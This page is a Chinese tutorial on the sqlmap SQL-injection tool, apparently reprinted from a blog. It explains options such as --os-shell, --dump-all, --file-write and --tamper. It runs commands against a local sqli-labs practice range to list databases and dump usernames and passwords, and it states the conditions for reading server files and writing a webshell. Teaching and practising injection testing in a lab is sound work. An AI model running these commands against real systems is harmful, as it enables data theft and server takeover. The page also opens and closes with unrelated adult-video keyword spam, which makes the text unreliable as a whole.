色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

Sqlmap簡介與使用

麥辣雞腿堡 ? 來源:CSDN博客 ? 作者:白晝安全 ? 2023-01-14 11:24 ? 次閱讀

白晝安全

一、Sqlmap簡介與使用
當(dāng)我們明白sql注入的原理,滲透過程似乎很簡單。但事實(shí)上,在實(shí)際的滲透當(dāng)中,漏洞注入并非僅僅只是通過簡單的一兩次嘗試就能夠得到測試人員想要的答案。很多時候,它需要經(jīng)過許多次繁雜的嘗試。所以,要提高滲透測試的效率,單純的依靠測試人員自身的實(shí)戰(zhàn)經(jīng)驗(yàn)也是遠(yuǎn)遠(yuǎn)不夠的。因此,我們需要滲透工具的幫助。而sqlmap就是這樣一款強(qiáng)大而且便于操作的滲透測試工具。

sqlmap是一個開源的滲透測試工具,可以用來進(jìn)行自動化檢測,利用SQL注入漏洞,獲取數(shù)據(jù)庫服務(wù)器的權(quán)限。它具有功能強(qiáng)大的檢測引擎,針對各種不同類型數(shù)據(jù)庫的滲透測試的功能選項(xiàng),包括獲取數(shù)據(jù)庫中存儲的數(shù)據(jù),訪問操作系統(tǒng)文件甚至可以通過外帶數(shù)據(jù)連接的方式執(zhí)行操作系統(tǒng)命令。
1、Sqlmap的安裝


Sqlmap安裝完成后,那么即可開始使用。

2、sqlmap的使用
-u

指定目標(biāo)URL (可以是http協(xié)議也可以是https協(xié)議)

-d

連接數(shù)據(jù)庫

--dbs

列出所有的數(shù)據(jù)庫

--current-db

列出當(dāng)前數(shù)據(jù)庫

--tables

列出當(dāng)前的表

--columns

列出當(dāng)前的列

-D

選擇使用哪個數(shù)據(jù)庫

-T

選擇使用哪個表

-C

選擇使用哪個列

--dump

獲取字段中的數(shù)據(jù)

--dump-all

拖庫

--batch

自動選擇yes

--smart

啟發(fā)式快速判斷,節(jié)約浪費(fèi)時間

--forms

嘗試使用post注入

-r

加載文件中的HTTP請求(本地保存的請求包txt文件)

-l

加載文件中的HTTP請求(本地保存的請求包日志文件)

-g

自動獲取Google搜索的前一百個結(jié)果,對有GET參數(shù)的URL測試

-o

開啟所有默認(rèn)性能優(yōu)化

--tamper

調(diào)用腳本進(jìn)行注入

-v

指定sqlmap的回顯等級

--delay

設(shè)置多久訪問一次

--os-shell

獲取主機(jī)shell,一般不太好用,因?yàn)闆]權(quán)限

-m

批量操作

-c

指定配置文件,會按照該配置文件執(zhí)行動作

-data

data指定的數(shù)據(jù)會當(dāng)做post數(shù)據(jù)提交

-timeout

設(shè)定超時時間

-level

設(shè)置注入探測等級共有五個等級,默認(rèn)為1級, 這個參數(shù)不僅影響使用哪些payload同時也會影響測試的注入點(diǎn),GET和POST的數(shù)據(jù)都會測試,HTTP Cookie在level為2的時候就會測試,HTTP User-Agent/Referer頭在level為3的時候就會測試。總之在你不確定哪個payload或者參數(shù)為注入點(diǎn)的時候,為了保證全面性,建議使用高的level值。

--is-dba

判斷當(dāng)前用戶是否為數(shù)據(jù)庫管理員權(quán)限

--risk

風(fēng)險等級

--identify-waf

檢測防火墻類型

--param-del="分割符"

設(shè)置參數(shù)的分割符

--skip-urlencode

不進(jìn)行url編碼

--keep-alive

設(shè)置持久連接,加快探測速度

--null-connection

檢索沒有body響應(yīng)的內(nèi)容,多用于盲注

--thread

最大為10 設(shè)置多線程

--delay

有些web服務(wù)器請求訪問太過頻繁可能會被防火墻攔截,使用--delay就可以設(shè)定兩次http請求的延時

--safe-url

有的web服務(wù)器會在多次錯誤的訪問請求后屏蔽所有請求,使用--safe-url 就可以每隔一段時間去訪問一個正常的頁面。

--technique

指定注入類型

B:Boolean-based-blind (布爾型型注入)

E:Error-based (報(bào)錯型注入)

U:Union query-based (聯(lián)合注入)

S:Starked queries (通過sqlmap讀取文件系統(tǒng)、操作系統(tǒng)、注冊表必須 使用該參數(shù),可多語句查詢注入)

T:Time-based blind (基于時間延遲注入)

--tamper

語法:--tamper ["腳本名稱"]

當(dāng)調(diào)用多個腳本的時候,腳本之間用逗號隔開,調(diào)用的腳本在 sqlmap文件夾下的 tamper 文件夾中


-v ["x"]

使用sqlmap注入測試時,可以使用 -v [x] 參數(shù)來指定回顯信息的復(fù)雜程度, x 的取值范圍為[0~6]:

等級

解釋

0

只顯示python錯誤以及嚴(yán)重信息

1

同時顯示基本信息和警告信息

2

同時顯示debug信息

3

同時顯示注入的pyload

4

同時顯示HTTP請求

5

同時顯示HTTP相應(yīng)頭

6

同時顯示HTTP相應(yīng)頁面

二、Sqlmap自動化基礎(chǔ)注入實(shí)戰(zhàn)
環(huán)境:sql-lib靶場第一關(guān),url如下

http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1
1、取數(shù)據(jù)庫名
python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" --dbs --batch
效果如下


2、讀取表名
python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" -D "security" --tables --batch
效果如下


3、讀取字段名
python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" -D "security" -T “users” --columns --batch
效果如下


4、讀取數(shù)據(jù)
python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" -D "security" -T “users” -C “username,password” --dump --batch
效果如下


三、sqlmap讀取目標(biāo)系統(tǒng)文件
利用sqlmap讀取文件,也是需要滿足條件的。

(1)當(dāng)前sql注入用戶必須為DBA權(quán)限(--is-dba為true)

(2)需要知道網(wǎng)站的絕對路徑

(3)My.ini文件中的這項(xiàng)配置secure_file_priv=””為空

四、通過sqlmap寫入webshell
Sqlmap寫入webshell也是和手工寫入webshell一樣需要滿足條件:

(1)當(dāng)前sql注入用戶必須為DBA權(quán)限(--is-dba為true)
(2)需要知道網(wǎng)站的絕對路徑
(3)My.ini文件中的這項(xiàng)配置secure_file_priv=””為空
這個操作和通過sql注入的union配合into outfile原理一樣,只不過sqlmap提供了一鍵化操作,格式如下即可

--file-write //要寫入的文件
--file-dest //寫入文件存放的路徑
具體操作就是通過--os-shell,相信很多同學(xué)應(yīng)該都會了,所以這里就不多講了

原文鏈接:https://blog.csdn.net/qq_63844103/article/details/128671338

編輯:何安

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報(bào)投訴
  • 網(wǎng)絡(luò)安全
    +關(guān)注

    關(guān)注

    10

    文章

    3176

    瀏覽量

    59921
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    768

    瀏覽量

    44175
  • 自動化
    +關(guān)注

    關(guān)注

    29

    文章

    5596

    瀏覽量

    79407
收藏 人收藏

    評論

    相關(guān)推薦

    sqlmap的安裝與使用

    44sqlmap的安裝與使用
    發(fā)表于 04-20 10:10

    DAC簡介

    文章目錄一、DAC簡介一、DAC簡介
    發(fā)表于 08-09 08:18

    TraceX使用簡介

    TraceX使用簡介TraceX 軟件生成跟蹤bufTrace APItx_trace_enabletx_trace_enabletx_trace_event_filtertx_trace_event_unfiltertx_trace_disabletx_trace_isr_enter_inserttx_trace
    發(fā)表于 02-22 06:59

    FPGA簡介

    (06)FPGA資源評估1.1 目錄1)目錄2)FPGA簡介3)Verilog HDL簡介4)FPGA資源評估5)結(jié)語1.2 FPGA簡介FPGA(Field Programmable Gate
    發(fā)表于 02-23 06:31

    NoOs簡介

    NoOs文章目錄NoOs簡介代碼目錄API 說明移植快速上手更多示例License簡介NoOs 名字的寓意取自于:“NoOs is not an operating system”。NoOs 的目標(biāo)是提供類似RTOS的開發(fā)方式,代碼量比.
    發(fā)表于 03-01 07:52

    電感元件簡介與展望

    電感元件簡介與展望 電感元件原理,磁性鐵電材料,磁性電感元件分類,電感元件制程簡介,電感元件規(guī)格與應(yīng)用。
    發(fā)表于 11-20 14:19 ?21次下載

    ANOTO技術(shù)簡介

    ANOTO技術(shù)簡介 一、Anoto技術(shù)簡介 Anoto技術(shù)主要體現(xiàn)為三個組成部分:數(shù)碼紙、數(shù)碼筆及Anoto軟件平臺。 二、數(shù)碼紙
    發(fā)表于 09-17 18:11 ?3275次閱讀
    ANOTO技術(shù)<b class='flag-5'>簡介</b>

    手機(jī)簡介

    手機(jī)簡介
    發(fā)表于 12-19 10:27 ?643次閱讀

    Windows CE簡介、特點(diǎn)及應(yīng)用

    Windows CE簡介、特點(diǎn)及應(yīng)用 一、Windows CE簡介  
    發(fā)表于 01-11 08:43 ?4121次閱讀

    ISE10.1使用簡介

    ISE10.1使用簡介 ISE10.1使用簡介
    發(fā)表于 02-18 18:16 ?9次下載

    Proteus示波器簡介

    Proteus 中示波器的操作 簡介簡介基于 proteus7.8 版本
    發(fā)表于 03-22 11:19 ?15次下載

    不同的SQLMap命令

    SQLMap是每個滲透測試師的必備工具。這是眾多強(qiáng)大的主流工具之一,尤其是在測試OWASP Top 10中的SQL注入漏洞時。從掃描SQL注入漏洞到獲取數(shù)據(jù)庫名字、表和列,以及獲得系統(tǒng)訪問權(quán)限,其可被用于多種目的。
    的頭像 發(fā)表于 09-15 09:19 ?1383次閱讀

    POE簡介

    POE簡介
    發(fā)表于 11-01 08:27 ?0次下載
    POE<b class='flag-5'>簡介</b>

    FST 簡介

    FST 簡介
    發(fā)表于 11-14 21:08 ?0次下載
    FST <b class='flag-5'>簡介</b>

    GERBER FILE 簡介.zip

    GERBERFILE簡介
    發(fā)表于 12-30 09:20 ?3次下載
    主站蜘蛛池模板: 亚洲精品乱码8久久久久久日本| 一个人的视频全免费在线观看www| 内地同志男16china16| 美女也烦恼主题曲| 女子叉开腿让男子桶免费软件 | 亚洲无遮挡无码A片在线| 性色AV一区二区三区V视界影院| 亚洲精品美女久久久久99| 野花韩国高清完整版在线| 男女交性视频无遮挡全过程| 久久精品黄色| 麻豆国产人妻精品无码AV| 久久国产乱子伦精品免费M| 久久久精品免费视频| 男同志video最新猛男| 日韩欧美高清一区| 亚洲国产精品嫩草影院| 一本之道高清www在线观看| 97精品国产自产在线观看永久| 成人国产在线不卡视频| 国产人妻人伦精品无码.麻豆| 久久精品视频在线直播6| 欧美日韩一区二区三区四区| 无码日本亚洲一区久久精品| 一抽一出BGM免费3分钟| jizz日本女人| 国产在线观看不卡| 男人J放进女人屁股免费观看| 色悠久久综合| 诱受H嗯啊巨肉舍友1V1| 菠萝菠萝蜜在线观看视频| 国产一级特黄aa毛片| 男女啪啪抽搐呻吟高潮动态图| 涩涩爱涩涩片影院| 一级毛片免费在线播放| 本庄优花aⅴ全部在线影片| 果冻传媒在线观看资源七夕| 娇小亚裔被两个黑人| 男生jj插入女生jj| 性欧美videosex18嫩| 99热这里有精品|